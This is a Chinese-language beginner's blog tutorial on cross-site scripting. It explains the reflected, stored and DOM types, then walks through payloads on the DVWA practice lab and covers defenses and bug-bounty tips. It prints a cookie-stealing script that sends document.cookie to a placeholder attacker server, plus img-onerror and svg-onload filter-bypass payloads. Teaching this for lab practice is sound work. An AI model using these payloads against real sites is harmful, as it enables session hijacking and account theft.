从弹窗到盗号:XSS攻击入门到实战,看懂这篇就够了(第七弹·跨站脚本篇)

发布时间:2026/7/17 17:28:32
从弹窗到盗号:XSS攻击入门到实战,看懂这篇就够了(第七弹·跨站脚本篇) 如果说SQL注入是“骗数据库”那XSS就是“骗浏览器”。全文约1900字阅读约6分钟。带你从零理解什么是XSS亲手弹出第一个弹窗。一、先讲一个真实故事一个评论区的“定时炸弹”2018年某大型社交平台爆出了一个严重漏洞。攻击者在自己的个人主页简介里写入了一段恶意JavaScript代码。任何点进他主页的用户浏览器都会自动执行这段代码——Cookie被悄悄发送到了攻击者的服务器上。这意味着什么攻击者拿到了你的登录凭证不需要你的密码就能以你的身份发帖、私信、甚至修改账号信息。更可怕的是这个攻击者把这段恶意代码写在了个人简介里——每个访问他主页的人都会中招。一传十、十传百短短几小时成千上万的账号被波及。这就是XSS跨站脚本攻击的威力。二、XSS到底是什么说人话官方定义是这样的XSSCross-Site Scripting跨站脚本攻击是一种Web安全漏洞攻击者通过在网页中注入恶意脚本在受害者浏览器中执行非法操作。说人话就是你在网页上输入的内容被网站“原封不动”地展示给了其他用户而这段内容里藏着恶意代码。想象一下你在一个论坛的评论区里写了一段话。如果网站没有对你的输入做任何处理直接把它显示在页面上——那你写的就不是“一段话”而可能是一段能让所有打开这个页面的人电脑“中毒”的代码。XSS的核心就是让别人的浏览器执行你写的代码。三、XSS的三种类型新手5分钟分清 类型一反射型XSSReflected XSS特点恶意代码藏在URL链接里一次性的点一次中一次。场景你收到一条链接http://xxx.com/search?qscriptalert(1)/script。你点开后网站直接把q参数的值显示在页面上——弹窗出现了。为什么叫“反射”因为攻击代码是“反射”回来的——你发给服务器什么服务器原样返回给你。危害程度⭐⭐⭐需要诱骗用户点击链接 类型二存储型XSSStored XSS特点恶意代码永久保存在服务器上数据库里所有访问的人都会中招。场景你在论坛评论区写了一段恶意代码网站把它存进了数据库。之后每一个打开这个帖子的人浏览器都会自动执行这段代码。危害程度⭐⭐⭐⭐⭐最危险影响面最广 类型三DOM型XSSDOM-based XSS特点恶意代码不经过服务器直接在浏览器端通过修改DOM执行。场景网站的JavaScript从URL中读取参数直接写入页面。攻击者构造一个恶意URL用户点开即中招。危害程度⭐⭐⭐⭐隐蔽性强难以防御四、15分钟实战在DVWA上弹出第一个XSS弹窗⚠️ 以下操作仅在DVWA本地靶场进行请勿对未授权网站测试。 第一步进入DVWA的XSS模块1分钟打开DVWA左侧菜单找到XSS (Reflected)反射型XSS安全级别调到Low。你会看到一个输入框让你输入名字。 第二步输入测试内容1分钟输入Hello点提交。页面显示Hello Hello。现在输入scriptalert(1)/script点提交——一个弹窗跳出来了恭喜你成功执行了人生第一个XSS攻击。 第三步理解发生了什么2分钟你输入的内容被直接“塞”进了HTML页面里htmlHello scriptalert(1)/script浏览器看到script标签老老实实地执行了里面的JavaScript代码。这就是XSS的本质——你的输入变成了页面代码的一部分。 第四步从弹窗到盗Cookie3分钟弹窗只是证明“能执行代码”。真正危险的是这段代码htmlscript document.write(img srchttp://你的服务器/steal?cookie document.cookie ); /script当用户访问这个页面时他的Cookie会被偷偷发送到你的服务器上。有了Cookie你就能“冒充”他登录。 第五步挑战存储型XSS5分钟切换到DVWA的XSS (Stored)存储型XSS。在“留言板”里输入同样的scriptalert(1)/script提交。然后刷新页面——弹窗又出现了这就是存储型XSS的恐怖之处代码被存进了数据库每次刷新、每个访问者都会中招。五、新人最常踩的3个坑❌坑一只知道用scriptalert(1)/script实战中大多数网站都会过滤script标签。你需要学习各种绕过技巧——用img srcx onerroralert(1)、svg onloadalert(1)等。❌坑二觉得XSS只能弹窗没什么危害弹窗只是“概念验证”。真正的危害是盗取Cookie、劫持会话、钓鱼攻击、键盘记录、内网扫描。一个存储型XSS可以变成一场“蠕虫病毒”级别的灾难。❌坑三只学攻击不学防御面试官一定会问“怎么防御XSS” 记住三句话输出编码在显示用户输入时对、、、等特殊字符进行HTML实体编码。输入验证对用户输入做白名单过滤只允许安全的内容。CSP内容安全策略通过HTTP头限制页面能执行哪些来源的脚本。六、XSS学习资源包 必刷靶场XSS-labsGitHub开源项目1-20关涵盖各种XSS类型和绕过技巧XSS-GameGoogle出品的XSS挑战共18关通关即入门DVWAXSS (Reflected / Stored / DOM) 三个模块必做 必读文章FreeBuf搜索“XSS”标签有大量实战案例分享各SRC平台的漏洞报告看看别人是怎么挖到XSS的 挖洞建议新手首选公益SRC漏洞盒子、补天SRC收录范围广重点关注评论区、搜索框、个人资料编辑、留言板等有“输入→展示”功能的地方测试前务必确认是否在授权范围内写在最后SQL注入和XSS并称Web安全“两大入门漏洞”。SQL注入是“骗数据库”XSS是“骗浏览器”——理解了这两个你就拿到了Web安全的“入场券”。今天这篇文章我带你从原理到实战走了一遍XSS。请你现在就打开DVWA把反射型、存储型、DOM型三种XSS都亲手弹一遍。学安全的捷径只有一个动手。动手。再动手。等你用XSS挖到第一个漏洞奖金的那天记得回来告诉我。—— 陪你从零到一的网安引路人下期预告第八弹·文件上传篇——《一张图片如何变成服务器权限文件上传漏洞全解析》。关注我不错过每一篇干货。